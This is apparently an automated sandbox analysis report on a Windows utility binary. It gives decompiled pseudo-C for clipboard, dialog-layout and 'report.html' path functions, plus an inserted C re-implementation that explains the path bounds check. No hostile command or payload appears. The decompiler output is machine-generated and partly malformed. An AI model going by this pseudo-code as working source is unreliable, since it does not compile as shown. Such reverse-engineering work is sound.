• free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
• Instruction ID: 3b7e158b20e84301f479c6044b2c5b8c75456169b8cefd1b15b644340405c36b
• Opcode Fuzzy Hash: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
• Instruction Fuzzy Hash: 8FC04C72910B019BE7349F26D449766B3E4BF1073BF618C2DA4D5914C1DBBCE494CA18
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403F55(void** __esi) {
    void* _t5;
    signed int* _t7;

    _t7 = __esi;
    _t5 = *__esi;
    if(_t5 != 0) {
        free(_t5); // executed
    }
    *_t7 = *_t7 & 0x00000000;
    _t7[3] = _t7[3] & 0x00000000;
    _t7[1] = _t7[1] & 0x00000000;
    return _t5;
}

APIs
• free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
• Instruction ID: 3143f4fb3421a8fd8d8aef00c743a9b8e7153b02c0e56cadf99ac6914a485b7f
• Opcode Fuzzy Hash: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
• Instruction Fuzzy Hash: 48C00272910B019FE7309E26C405B66B7E8AF1073BF918C1D94D5914C1D7BCD4448A14
Uniqueness
• Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 100%
E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
    void* __edi;
    int _t11;
    void* _t13;
    void* _t15;
    void* _t17;

    _t15 = __edx;
    _t13 = __ecx;
    _t16 = __esi + 0x6ac;
    E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
    *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
    E0040AE99(_t13, _t15, __esi, *((intOrPtr*)(__esi + 0x69c)));
    _t17 = E0040636E(_t16);
    _t11 = OpenClipboard(*(__esi + 0x208));
    if(_t11 != 0) {
        return E004054F1(_t17);
    }
    return _t11;
}

APIs
  • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
  • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
  • Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB
• OpenClipboard.USER32(?), ref: 0040AE86
  • Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
  • Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
  • Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
  • Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
  • Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
  • Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
  • Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
  • Part of subcall function 004054F1: CloseClipboard.USER32 ref: 0040554E
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
• String ID:
• API String ID: 2178300729-0
• Opcode ID: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
• Instruction ID: d2c7d0a254bb278864896b88801620e30a707c529b051fe324ebedfb26bf80ea
• Opcode Fuzzy Hash: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
• Instruction Fuzzy Hash: F0E0DFB1100B0056C6217736A801B9B76A26F80324B100B3EF8A6B11E2CB3960AA9A49
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 98%
E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
    signed int _v0;
    intOrPtr _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr _v24;
    intOrPtr _v32;
    signed int _v36;
    intOrPtr _v52;
    struct HWND__* _v56;
    struct HWND__* _v60;
    intOrPtr _v68;
    intOrPtr _v72;
    intOrPtr _v76;
    struct HDC__* _t169;
    struct HWND__* _t171;
    intOrPtr _t220;
    void* _t221;
    intOrPtr _t232;
    struct HWND__* _t234;
    void* _t237;
    intOrPtr* _t271;
    signed int _t272;
    signed int _t273;

    _t271 = __esi;
    _t273 = _t272 & 0xfffffff8;
    E0040E340(0x4298, __ecx);
                                                                                                                                                				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
                                                                                                                                                				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
                                                                                                                                                				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
                                                                                                                                                				_a20 = GetWindowLongW(_t234, 0xfffffff0);
                                                                                                                                                				_a24 = GetWindowLongW(_a4, 0xfffffff0);
                                                                                                                                                				_a96 = GetWindowLongW(_t234, 0xffffffec);
                                                                                                                                                				_a36 = GetWindowLongW(_a4, 0xffffffec);
                                                                                                                                                				GetWindowRect(_t234,  &_a100);
                                                                                                                                                				GetWindowRect(_a4,  &_a60);
                                                                                                                                                				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
                                                                                                                                                				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
                                                                                                                                                				_t237 = _a108 - _a100.x;
                                                                                                                                                				_a4 = _a4 & 0x00000000;
                                                                                                                                                				_a28 = _a68 - _a60.x;
                                                                                                                                                				_a76 = _a112 - _a104;
                                                                                                                                                				_a40 = _a72 - _a64;
                                                                                                                                                				_t169 = GetDC( *(__esi + 0x10));
                                                                                                                                                				_a16 = _t169;
                                                                                                                                                				if(_t169 == 0) {
                                                                                                                                                					L9:
                                                                                                                                                					_v0 = _v0 & 0x00000000;
                                                                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
                                                                                                                                                						L12:
                                                                                                                                                						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
                                                                                                                                                						_a36 = _t171;
                                                                                                                                                						GetWindowRect(_t171,  &_a44);
                                                                                                                                                						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
                                                                                                                                                						GetClientRect( *(_t271 + 0x10),  &_a124);
                                                                                                                                                						GetWindowRect( *(_t271 + 0x10),  &_a80);
                                                                                                                                                						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                                                                                						GetClientRect( *(_t271 + 0x10),  &_a80);
                                                                                                                                                						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                                                                                					}
                                                                                                                                                					_a20 = _a20 | 0x10000000;
                                                                                                                                                					_a24 = _a24 | 0x10000000;
                                                                                                                                                					_a8 = _a12 + 0x10;
                                                                                                                                                					do {
                                                                                                                                                						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
                                                                                                                                                						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
                                                                                                                                                						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
                                                                                                                                                						L0040DFD6();
                                                                                                                                                						_t273 = _t273 + 0x10;
                                                                                                                                                						SetWindowTextW(_v56,  &_a72);
                                                                                                                                                						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
                                                                                                                                                						_v68 = _v68 + 0x14;
                                                                                                                                                						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
                                                                                                                                                						_v76 = _v76 + 1;
                                                                                                                                                					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
                                                                                                                                                					goto L12;
                                                                                                                                                				}
                                                                                                                                                				_t220 = 0;
                                                                                                                                                				_a32 = _a32 & 0;
                                                                                                                                                				_a8 = 0;
                                                                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
                                                                                                                                                					L8:
                                                                                                                                                					_t221 = _t220 - _t237;
                                                                                                                                                					_a28 = _a28 - _t221;
                                                                                                                                                					_a60.x = _a60.x + _t221;
                                                                                                                                                					_t237 = _t237 + _t221;
                                                                                                                                                					ReleaseDC( *(_t271 + 0x10), _a16);
                                                                                                                                                					goto L9;
                                                                                                                                                				}
                                                                                                                                                				_v0 = _a12 + 0x10;
                                                                                                                                                				do {
                                                                                                                                                					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
                                                                                                                                                						_t232 = _a100.x + 0xa;
                                                                                                                                                						if(_t232 > _v8) {
                                                                                                                                                							_v8 = _t232;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					_a16 =  &(_a16->i);
                                                                                                                                                					_v16 = _v16 + 0x14;
                                                                                                                                                				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
                                                                                                                                                				_t220 = _v8;
                                                                                                                                                				goto L8;
                                                                                                                                                			}

Address column of the decompiler view (detached from the listing above by extraction): the function's instructions span 0x0040d12c to 0x0040d4a4.

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32 ref: 0040D159
                                                                                                                                                • GetDlgItem.USER32 ref: 0040D165
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040D180
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0040D195
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D1A7
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D1B2
                                                                                                                                                • MapWindowPoints.USER32 ref: 0040D1C6
                                                                                                                                                • MapWindowPoints.USER32 ref: 0040D1D4
                                                                                                                                                • GetDC.USER32 ref: 0040D20D
                                                                                                                                                • wcslen.MSVCRT ref: 0040D24D
                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
                                                                                                                                                • ReleaseDC.USER32 ref: 0040D2AB
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040D36E
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D382
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
                                                                                                                                                • GetDlgItem.USER32 ref: 0040D3D6
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D3E6
                                                                                                                                                • MapWindowPoints.USER32 ref: 0040D3F4
                                                                                                                                                • GetClientRect.USER32 ref: 0040D40B
                                                                                                                                                • GetWindowRect.USER32 ref: 0040D415
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
                                                                                                                                                • GetClientRect.USER32 ref: 0040D465
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                • Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                • Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
                                                                                                                                                • Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                • Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

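Before the decompilation of E0040A742 that follows, the part worth an analyst's attention is how the function picks a location for `report.html`: the global wide-char path buffer at 0x4134e0 is filled by E00405812, replaced by `GetTempPathW(0x104, ...)` when `GetFileAttributesW` returns a value with bit 0 set, and the file name is appended (E00405930) only if directory + "report.html" + terminator stays below 0x104 (MAX_PATH) characters; otherwise the field at offset 0x288 is set to an empty string. The C below is an added re-implementation of that logic written for this report, not code from the sample or from the decompiler output. The function names and path strings are constructed for the illustration, and the two Windows API calls are replaced by their return values so the checks run on any platform.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <wchar.h>

/* Constants as they appear in the decompilation and the Windows SDK. */
#define MAX_PATH_W              0x104u        /* 260 wide chars: the limit the sample tests against */
#define FILE_ATTRIBUTE_READONLY 0x00000001u   /* the bit the sample masks from GetFileAttributesW */
#define INVALID_FILE_ATTRIBUTES 0xFFFFFFFFu   /* GetFileAttributesW failure value; bit 0 is set too */
#define REPORT_NAME             L"report.html"

/* Fallback decision as the sample makes it: (attrs & 1) != 0 selects the temp
 * directory. Because INVALID_FILE_ATTRIBUTES is all-ones, a directory that does
 * not exist or cannot be queried takes the same branch as a read-only one. */
bool falls_back_to_temp(uint32_t attrs) {
    return (attrs & FILE_ATTRIBUTE_READONLY) != 0;
}

/* Directory selection with the API calls replaced by their results (assumed
 * values; the sample itself calls GetFileAttributesW and GetTempPathW). */
const wchar_t *choose_report_dir(const wchar_t *preferred, uint32_t preferred_attrs,
                                 const wchar_t *temp_dir) {
    return falls_back_to_temp(preferred_attrs) ? temp_dir : preferred;
}

/* The bounds check before the file name is appended: dir + name + NUL must be
 * below MAX_PATH_W, otherwise the destination is left as an empty string, which
 * is what the decompiled branch writing a zero short to +0x288 does. */
bool build_report_path(const wchar_t *dir, const wchar_t *name,
                       wchar_t *out, size_t out_cap) {
    size_t dlen = wcslen(dir), nlen = wcslen(name);
    if (out_cap == 0) return false;
    if (dlen + nlen + 1 >= MAX_PATH_W || dlen + nlen + 1 > out_cap) {
        out[0] = L'\0';
        return false;
    }
    wmemcpy(out, dir, dlen);
    wmemcpy(out + dlen, name, nlen);
    out[dlen + nlen] = L'\0';
    return true;
}

/* Demonstration helper: builds into a static MAX_PATH buffer and returns it. */
const wchar_t *report_path_for(const wchar_t *dir) {
    static wchar_t out[MAX_PATH_W];
    build_report_path(dir, REPORT_NAME, out, MAX_PATH_W);
    return out;
}

/* Constructs a directory of dir_len 'A' characters and reports whether
 * report.html still fits under the sample's check. */
bool long_dir_fits(size_t dir_len) {
    wchar_t dir[MAX_PATH_W + 64], out[MAX_PATH_W];
    if (dir_len >= sizeof dir / sizeof dir[0]) return false;
    wmemset(dir, L'A', dir_len);
    dir[dir_len] = L'\0';
    return build_report_path(dir, REPORT_NAME, out, MAX_PATH_W);
}

/* Same construction, returning the length left in the buffer (0 on rejection). */
size_t report_len_for_dir_len(size_t dir_len) {
    wchar_t dir[MAX_PATH_W + 64], out[MAX_PATH_W];
    if (dir_len >= sizeof dir / sizeof dir[0]) return 0;
    wmemset(dir, L'A', dir_len);
    dir[dir_len] = L'\0';
    build_report_path(dir, REPORT_NAME, out, MAX_PATH_W);
    return wcslen(out);
}

int main(void) {
    /* Constructed example values; nothing here was read from the sample's memory. */
    const wchar_t *tool_dir = L"C:\\Tool\\";
    const wchar_t *temp_dir = L"C:\\Users\\x\\AppData\\Local\\Temp\\";

    /* 0x10 is FILE_ATTRIBUTE_DIRECTORY: bit 0 clear, so the preferred directory is kept. */
    printf("writable dir -> %ls\n", report_path_for(choose_report_dir(tool_dir, 0x10u, temp_dir)));
    /* A failed attribute lookup also falls back to the temp directory. */
    printf("missing dir  -> %ls\n", report_path_for(choose_report_dir(tool_dir, INVALID_FILE_ATTRIBUTES, temp_dir)));
    /* 247 + 11 + 1 = 259 < 260 fits; 248 does not and yields an empty path. */
    printf("247-char dir fits: %d, 248-char dir fits: %d\n", long_dir_fits(247), long_dir_fits(248));
    return 0;
}
```

Two points the re-implementation makes visible: the readonly test doubles as a non-existence test because of how INVALID_FILE_ATTRIBUTES is encoded, so on a host where the preferred directory is missing the sample's report location is the temp directory followed by `report.html`; and the length check is a correct pre-concatenation bound for a 0x104-character buffer (it rejects exactly when the terminator would no longer fit), so this particular copy is not an overflow candidate.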
                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __esi;
                                                                                                                                                				struct HMENU__* _t123;
                                                                                                                                                				struct HWND__* _t125;
                                                                                                                                                				void* _t131;
                                                                                                                                                				intOrPtr _t135;
                                                                                                                                                				intOrPtr _t139;
                                                                                                                                                				void* _t187;
                                                                                                                                                				long _t193;
                                                                                                                                                				void* _t198;
                                                                                                                                                				void* _t200;
                                                                                                                                                				void* _t216;
                                                                                                                                                				long _t218;
                                                                                                                                                				intOrPtr _t220;
                                                                                                                                                				intOrPtr _t221;
                                                                                                                                                				void* _t222;
                                                                                                                                                				int _t225;
                                                                                                                                                				void* _t226;
                                                                                                                                                				intOrPtr* _t228;
                                                                                                                                                				intOrPtr* _t229;
                                                                                                                                                				void* _t231;
                                                                                                                                                				void* _t232;
                                                                                                                                                				intOrPtr* _t233;
                                                                                                                                                				long _t241;
                                                                                                                                                
                                                                                                                                                				_t229 = _t231 - 0x78;
                                                                                                                                                				_t232 = _t231 - 0xa4;
                                                                                                                                                				 *((char*)(_t229 - 0x23)) = 1;
                                                                                                                                                				_t187 = __ecx;
                                                                                                                                                				 *(_t229 - 0x2c) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t229 - 0x28)) = 0;
                                                                                                                                                				 *((char*)(_t229 - 0x24)) = 0;
                                                                                                                                                				 *((char*)(_t229 - 0x22)) = 0;
                                                                                                                                                				 *((char*)(_t229 - 0x21)) = 0;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				 *(_t229 - 0x18) = 1;
                                                                                                                                                				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
                                                                                                                                                				 *((char*)(_t229 - 0x10)) = 4;
                                                                                                                                                				 *((char*)(_t229 - 0xf)) = 0;
                                                                                                                                                				 *((char*)(_t229 - 0xe)) = 0;
                                                                                                                                                				 *((char*)(_t229 - 0xd)) = 0;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				 *((intOrPtr*)(_t229 - 4)) = 5;
                                                                                                                                                				 *_t229 = 0x9c44;
                                                                                                                                                				 *((char*)(_t229 + 4)) = 4;
                                                                                                                                                				 *((char*)(_t229 + 5)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 6)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 7)) = 0;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				 *(_t229 + 0x10) = 2;
                                                                                                                                                				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
                                                                                                                                                				 *((char*)(_t229 + 0x18)) = 4;
                                                                                                                                                				 *((char*)(_t229 + 0x19)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x1a)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x1b)) = 0;
                                                                                                                                                				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				 *((intOrPtr*)(_t229 + 0x24)) = 3;
                                                                                                                                                				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
                                                                                                                                                				 *((char*)(_t229 + 0x2c)) = 4;
                                                                                                                                                				 *((char*)(_t229 + 0x2d)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x2e)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x2f)) = 0;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				 *((intOrPtr*)(_t229 + 0x38)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
                                                                                                                                                				 *((char*)(_t229 + 0x40)) = 4;
                                                                                                                                                				 *((char*)(_t229 + 0x41)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x42)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x43)) = 0;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
                                                                                                                                                				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
                                                                                                                                                				 *((char*)(_t229 + 0x54)) = 4;
                                                                                                                                                				 *((char*)(_t229 + 0x55)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x56)) = 0;
                                                                                                                                                				 *((char*)(_t229 + 0x57)) = 0;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				_t216 = 0x66;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				_t123 = E00406AFA(_t216);
                                                                                                                                                				 *(__ecx + 0x21c) = _t123;
                                                                                                                                                				SetMenu( *(__ecx + 0x208), _t123);
                                                                                                                                                				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
                                                                                                                                                				 *(_t187 + 0x214) = _t125;
                                                                                                                                                				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
                                                                                                                                                				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
                                                                                                                                                				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
                                                                                                                                                				_t131 = E00402DE1(__fp0);
                                                                                                                                                				 *(_t229 + 0x70) = _t131;
                                                                                                                                                				ImageList_Add( *(_t229 + 0x74), _t131, 0);
                                                                                                                                                				DeleteObject( *(_t229 + 0x70));
                                                                                                                                                				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
                                                                                                                                                				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
                                                                                                                                                				_t218 = 0x50810809;
                                                                                                                                                				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
                                                                                                                                                					_t218 = 0x50811809;
                                                                                                                                                				}
                                                                                                                                                				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
                                                                                                                                                				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                				_t193 =  *(_t139 + 0x2e0);
                                                                                                                                                				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
                                                                                                                                                				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
                                                                                                                                                				if(_t193 <= 0) {
                                                                                                                                                					L5:
                                                                                                                                                					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
                                                                                                                                                					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                					E004099C4(_t221);
                                                                                                                                                					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
                                                                                                                                                					_t222 = 0x68;
                                                                                                                                                					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
                                                                                                                                                					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
                                                                                                                                                					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
                                                                                                                                                					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
                                                                                                                                                					_t233 = _t232 + 0xc;
                                                                                                                                                					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
                                                                                                                                                					asm("sbb eax, eax");
                                                                                                                                                					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
                                                                                                                                                					 *( *(_t187 + 0x698)) = 1;
                                                                                                                                                					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
                                                                                                                                                 				_t241 =  *0x4134e0; // 0x0 -- global wide-char path buffer, 0x104 (MAX_PATH) characters
                                                                                                                                                 				if(_t241 == 0) { // buffer still empty: populate it
                                                                                                                                                 					E00405812(0x4134e0);
                                                                                                                                                 					// 0x1 is FILE_ATTRIBUTE_READONLY; INVALID_FILE_ATTRIBUTES (0xFFFFFFFF) also has bit 0 set,
                                                                                                                                                 					// so a path that cannot be queried takes the same fallback as a read-only one
                                                                                                                                                 					if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
                                                                                                                                                 						GetTempPathW(0x104, 0x4134e0); // fall back to the user's temp directory
                                                                                                                                                 					}
                                                                                                                                                 				}
                                                                                                                                                 				_t225 = wcslen(0x4134e0);
                                                                                                                                                 				 *_t233 = L"report.html";
                                                                                                                                                 				_t105 = wcslen(??) + 1; // 0x1
                                                                                                                                                 				_t243 = _t225 + _t105 - 0x104;
                                                                                                                                                 				// bounds check: directory + "report.html" + terminator must fit in a 0x104 wide-char buffer
                                                                                                                                                 				if(_t225 + _t105 >= 0x104) {
                                                                                                                                                 					 *((short*)(_t187 + 0x288)) = 0; // too long: the report path field stays an empty string
                                                                                                                                                 				} else {
                                                                                                                                                 					E00405930(_t187 + 0x288, 0x4134e0, L"report.html"); // appears to build <dir>report.html into the field at +0x288
                                                                                                                                                 				}
					_t198 = 0x30;
					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
					_t226 = _t187;
					E0040A6FF(_t226);
					E00405D0F( *(_t187 + 0x214), 0x2000000);
					_t200 = 1;
					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
					E0040A1DC(0, _t200, _t226, _t243);
					 *(_t229 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
					return E00401BDC(_t226, 0x415);
				} else {
					_t228 = _t220 + 0xc;
					 *(_t229 + 0x74) = _t193;
					do {
						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
						_t232 = _t232 + 0x10;
						_t228 = _t228 + 0x14;
